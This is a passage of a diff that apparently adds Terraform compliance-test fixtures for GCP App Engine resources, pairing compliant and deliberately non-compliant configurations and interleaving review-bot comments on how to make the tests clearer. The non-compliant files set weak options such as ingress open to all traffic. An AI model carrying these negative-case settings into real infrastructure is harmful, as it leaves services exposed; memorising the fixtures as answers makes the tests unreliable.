shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/invalid-path" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file 
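Review bot: `path = "/invalid-path"` in `nc.tf` differs from the compliant `path = "/"` only by its literal value, so the policy must be matching specific path strings; document the accepted paths (or pattern) in the policy and echo it in a fixture comment, because from these two files a reviewer cannot tell whether a value like `/healthz` would pass or fail. Since `path` is a required argument of both check blocks, "readiness path missing" is not a case these fixtures can represent, so the string rule is the whole test.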
diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/plan.json new file mode 100644 index 000000000..089f40024 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} 
diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/c.tf new file mode 100644 index 000000000..07ed32a1a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/c.tf @@ -0,0 +1,34 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + timeout = "4s" + } + + readiness_check { + path = "/" + timeout = "4s" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/nc.tf new file mode 100644 index 000000000..e328895ab --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/nc.tf 
@@ -0,0 +1,34 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1-bad" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + timeout = "4s" + } + + readiness_check { + path = "/" + timeout = "30s" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/plan.json new file mode 100644 index 000000000..4e63b0847 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/.terraform.lock.hcl 
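Review bot: `nc.tf` sets `version_id = "v1-bad"` in addition to `readiness_check.timeout = "30s"`, so it differs from `c.tf` in two attributes and no longer isolates the one named by the directory; revert `version_id` to `"v1"` so a policy that happened to key on the version name could not pass this fixture by accident.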
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/c.tf new file mode 100644 index 000000000..3e0fdb9e3 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/c.tf @@ -0,0 +1,15 @@ +resource "google_app_engine_flexible_app_version" "c" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs" + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { path = "/" } + readiness_check { path = "/" } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/config.tf new file mode 100644 index 000000000..9f4356520 
--- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/nc.tf new file mode 100644 index 000000000..6107c37ea --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/nc.tf @@ -0,0 +1,15 @@ +resource "google_app_engine_flexible_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "python27" + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { path = "/" } + readiness_check { path = "/" } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/plan.json new file mode 100644 index 000000000..1a9131dc2 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/.terraform.lock.hcl 
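Review bot: `runtime = "python27"` in `nc.tf` is the legacy standard-environment runtime identifier rather than a flexible-environment runtime, so this negative case conflates "retired runtime" with "value that is not valid for this resource"; the policy should carry the runtime allow-list it enforces so that `nodejs` passing and `python27` failing can be checked against it, and the fixture should say which of the two failure modes it is meant to exercise. Both runtime fixtures also drop `entrypoint`, `deployment` and `service_account` that every other fixture includes; harmless for a plan, but keep the skeleton uniform so diffs between directories show only the attribute under test.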
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/c.tf new file mode 100644 index 000000000..ce0d8da46 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/c.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file 
diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/nc.tf new file mode 100644 index 000000000..823de9b73 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/nc.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "unauthorized-app" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/plan.json new file mode 100644 index 000000000..19b473609 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null 
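Review bot: The `service` policy for `google_app_engine_flexible_app_version` is a name allow-list (`"default"` passes, `"unauthorized-app"` fails), which only the fixture values reveal; the policy should document the permitted service names and their source, and a comment in `nc.tf` should say this is a naming rule rather than a schema check, since the directory name `service` suggests neither.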
+++ b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/c.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/c.tf new file mode 100644 index 000000000..1d4c8dea5 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/c.tf @@ -0,0 +1,7 @@ +resource "google_app_engine_service_network_settings" "c" { + project = "gcp-project-12345" + service = "internalapp" + network_settings { + ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY" + } +} \ No newline at end of file 
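Review bot: The compliant fixture covers only `ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY"`; the provider's enum also includes `INGRESS_TRAFFIC_ALLOWED_INTERNAL_AND_LB` (VPC plus load balancer traffic) and `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`, and whether those pass is the interesting boundary for an ingress policy. Add fixtures for them, or state in the policy which values are accepted, so the decision is explicit instead of falling out of a single string comparison.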
diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/config.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/nc.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/nc.tf new file mode 100644 index 000000000..525ffb2c7 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/nc.tf @@ -0,0 +1,7 @@ +resource "google_app_engine_service_network_settings" "nc" { + project = "gcp-project-12345" + service = "public-app" + network_settings { + ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_ALL" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/plan.json b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/plan.json new file mode 100644 index 000000000..0330d4b01 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_network_settings/service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null 
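Review bot: `nc.tf` changes `service` from `"internalapp"` to `"public-app"` as well as switching `ingress_traffic_allowed` to `"INGRESS_TRAFFIC_ALLOWED_ALL"`, so the two fixtures differ in two attributes; keep the service name identical so the finding is attributable to `ingress_traffic_allowed` alone.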
+++ b/inputs/gcp/app_engine/app_engine_service_network_settings/service/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/c.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/service/c.tf new file mode 100644 index 000000000..1c7645885 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/service/c.tf @@ -0,0 +1,7 @@ +resource "google_app_engine_service_network_settings" "c" { + project = "gcp-project-12345" + service = "app-internal-service" + network_settings { + ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY" + } +} \ No newline at end of file 
diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/config.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/nc.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/service/nc.tf new file mode 100644 index 000000000..019acd796 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/service/nc.tf @@ -0,0 +1,7 @@ +resource "google_app_engine_service_network_settings" "nc" { + project = "gcp-project-12345" + service = "internal-service" + network_settings { + ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/plan.json b/inputs/gcp/app_engine/app_engine_service_network_settings/service/plan.json new file mode 100644 index 000000000..4a45c08ec Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_network_settings/service/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/.terraform.lock.hcl 
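Review bot: `c.tf` uses `service = "app-internal-service"` and `nc.tf` uses `service = "internal-service"`, both with `INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY`, and nothing in either file explains why one name is compliant and the other is not; the rule (a required prefix such as `app-`, or an explicit allow-list) must be stated in the policy or a fixture comment, because as written the test passes for any policy that distinguishes those two particular strings.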
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/c.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/c.tf new file mode 100644 index 000000000..19c2abb1d --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/c.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_service_split_traffic" "c" { + project = "gcp-project-12345" + service = "hardhat-main-api" + migrate_traffic = false + split { + shard_by = "IP" + allocations = { "v1" = 0.5, "v2" = 0.5 } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/config.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/nc.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/nc.tf new file mode 100644 index 000000000..97c55147a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/nc.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_service_split_traffic" "nc" { + project = "gcp-project-12345" + service = "hardhat-main-api" + migrate_traffic = true + split { + shard_by = "IP" + allocations = { "v1" = 0.5, "v2" = 0.5 } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/plan.json b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/plan.json new file mode 100644 index 000000000..cc0aa2b3d Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/.terraform.lock.hcl 
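Review bot: `migrate_traffic = true` in `nc.tf` is a documented provider option rather than an obviously unsafe setting, and the fixture does not say whether the finding is triggered by `migrate_traffic` alone or by its combination with the 50/50 `allocations` map; add a comment in `nc.tf` stating why gradual migration is treated as non-compliant, and a fixture with `migrate_traffic` omitted so the default behaviour is pinned as well.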
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/c.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/c.tf new file mode 100644 index 000000000..dd31c7977 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/c.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "c" { + project = "gcp-project-12345" + service = "hardhat-main-api" + split { + shard_by = "IP" + allocations = { + "v1" = 0.5 + "v2" = 0.5 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/config.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/nc.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/nc.tf new file mode 100644 index 000000000..e9ecfdc09 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/nc.tf @@ -0,0 +1,10 @@ +resource "google_app_engine_service_split_traffic" "nc" { + project = "gcp-project-12345" + service = "generic-api" + split { + shard_by = "IP" + allocations = { + "v1" = 1.0 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/plan.json b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/plan.json new file mode 100644 index 000000000..74ef0e20a Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ 